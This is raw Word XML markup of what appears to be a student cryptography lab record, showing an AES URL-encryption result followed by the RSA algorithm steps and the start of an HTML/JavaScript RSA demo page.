        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98340E" w14:textId="77777777" w:rsidR="00A16F47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8CEDA1E" wp14:editId="42927B4D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130368</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2903220" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom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3220">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="290283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5004" id="Graphic 157" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.25pt;width:228.6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03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0hFwIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6L04cbGuNOMXQoMOA&#10;oivQFDsrshwbk0WNVOLk70fJcZJ1t2E+CKT4RD3yUV7cHTor9gapBVfK2WQqhXEaqtZtS/m6fvhw&#10;IwUF5SplwZlSHg3Ju+X7d4veFyaHBmxlUHASR0XvS9mE4IssI92YTtEEvHEcrAE7FdjFbVah6jl7&#10;Z7N8Ov2U9YCVR9CGiHdXQ1AuU/66Njp8r2syQdhSMreQVkzrJq7ZcqGKLSrftPpEQ/0Di061ji89&#10;p1qpoMQO279Sda1GIKjDREOXQV232qQauJrZ9E01L43yJtXCzSF/bhP9v7T6af/inzFSJ/8I+idx&#10;R7LeU3GORIdOmEONXcQycXFIXTyeu2gOQWjezG+n8zznZmuOzfLPqcmZKsazekfhq4GUR+0fKQwa&#10;VKOlmtHSBzeayEpGDW3SMEjBGqIUrOFm0NCrEM9FctEU/YVI3Otgb9aQouENc6Z2iVp3jeJS8pv5&#10;rRRjlYwdEGzEa7hXg5GuZvu6OOsii9l89vEmzQaBbauH1tpIg3C7ubco9ipOZvpiIZziD5hHCitF&#10;zYCjI0XnBLTuJNWgTtRpA9XxGUXPA11K+rVTaKSw3xxPTJz+0cDR2IwGBnsP6Y2kHvGt68MPhV5E&#10;AqUMLO4TjPOoilG3WP0ZG086+LILULdR1DRGA6OTw0OcSjw9uPhKrv2EuvwWlr8BAAD//wMAUEsD&#10;BBQABgAIAAAAIQBgPrY14AAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUjc&#10;qN0Q2irEqRA/h4oKibYScHPjJYkSr6PYbcPbsz3BcWZHs9/ky9F14ohDaDxpmE4UCKTS24YqDbvt&#10;y80CRIiGrOk8oYYfDLAsLi9yk1l/onc8bmIluIRCZjTUMfaZlKGs0Zkw8T0S37794ExkOVTSDubE&#10;5a6TiVIz6UxD/KE2PT7WWLabg9Ow+qrw+bNtVXq7/niVTyu72L1Zra+vxod7EBHH+BeGMz6jQ8FM&#10;e38gG0THOk15S9SQqDsQHJipaQJifzbmIItc/l9Q/AIAAP//AwBQSwECLQAUAAYACAAAACEAtoM4&#10;kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAI&#10;AAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAI&#10;AAAAIQBw6d0hFwIAAF4EAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQBgPrY14AAAAAkBAAAPAAAAAAAAAAAAAAAAAHEEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAAfgUAAAAA&#10;" path="m,l2902839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D11DAE5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31076CEB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:spacing w:val="-2"/>
          </w:rPr>
          <w:t>www.annauniv.edu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04EA323D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17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vibpFJW6Cvs5Y+L7t4N6YWWe07+JzS1d3CU2h3mEvEg=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Decrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:spacing w:val="-2"/>
          </w:rPr>
          <w:t>www.annauniv.edu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="279610D9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431121A2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034424AA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683F34F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="236"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDF01AE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="275" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155051EC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783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AES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output verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456378D1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText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1EB89A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JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799CBB24" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC4540F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62D98037" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14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RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Rivest–Shamir–Adleman)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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</w:p>
    <w:p w14:paraId="4D18A3BC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454E3066" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="211"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A38F5F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C012F2" w14:textId="77777777" w:rsidR="00A16F4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before="40"/>
        <w:ind w:left="1079" w:hanging="359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prime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q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A382D1" w14:textId="77777777" w:rsidR="00A16F4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before="2"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE488B" w14:textId="77777777" w:rsidR="00A16F4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line="322" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="35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e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(public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key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891D450" w14:textId="77777777" w:rsidR="00A16F4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line="322" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Compute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d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(private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key)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gcd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8AD667" w14:textId="77777777" w:rsidR="00A16F4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line="319" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250295A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:line="319" w:lineRule="exact"/>
        <w:ind w:left="1799" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Encryption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as,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584F25F4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2357"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-23"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6FEDB0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:before="39"/>
        <w:ind w:left="1799" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Decryption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as,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE66EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2338"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>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= c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BFAB2D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="87"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7116BAB5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0059809" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240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rsa.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A6427F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="39"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2251E8F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B62211F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D653F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="638"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;title&gt;RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Encryption&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37420A90" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="638"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;meta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>name="viewport"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>content="width=device-width,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C06A2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB76A44" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36747E75" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E241A7C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="638"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18C191" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;h1&gt;RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Algorithm&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6AC31" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;h2&gt;Implemented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Javascript&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC8CFCE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;hr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D90348" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F94EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E15C02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9381A2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="222"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;td&gt;Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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Prime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Number:&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0F394" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;td&gt;&lt;input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type="number"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>value="53"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>id="p"&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED326E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B4929C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E692CB0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;td&gt;Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Number:&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E41062" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;td&gt;&lt;input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type="number"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>value="59"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>id="q"&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F558580" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF49C1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED4B2E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5669E3EC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;td&gt;Enter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Message(cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>text):&lt;br&gt;[A=1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>B=2,...]&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3759C820" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
